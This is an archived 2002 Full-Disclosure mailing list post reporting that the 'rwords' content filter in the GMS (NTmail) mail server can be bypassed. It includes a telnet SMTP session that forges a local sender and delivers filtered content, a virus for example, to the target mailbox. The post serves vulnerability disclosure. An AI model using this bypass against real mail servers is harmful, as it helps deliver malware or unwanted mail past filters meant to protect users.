OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Geoincidents (geoincidents_at_getinfo.org)
Date: Sat Nov 23 2002 - 10:16:39 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    GMS (what used to be called NTmail) has a filtering feature called "rwords"
    that allows you to block incoming email based on word or phrase. If you add
    a phrase to the rwords list then no email with that phrase should be
    delivered to your users. Likewise if you add a virus signature this feature
    can be used to block email virus.

    From anywhere in the world try the following (replace rwords and the
    addresses then cut and paste this into a command prompt if you like):

    telnet mail.targetmailserver.com 25
    helo bob
    mail from:targetusertargetmailserver.com
    rcpt to:targetusertargetmailserver.com
    data
    From:targetusertargetmailserver.com
    To:targetusertargetmailserver.com
    Subject:delivery test

    this is a test
    rwords go here
    .
    quit

    Now go check that mailbox, rwords filtered email should not have been
    delivered to it but there it is.. complete with virus or whatever else you
    were trying to filter. This makes it trivial for anyone to bypass rwords
    type filters. If your boss tells you to filter out emails requesting a r e
    s u m e from employees then I could easily send your boss an email
    requesting his.

    Geo.

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html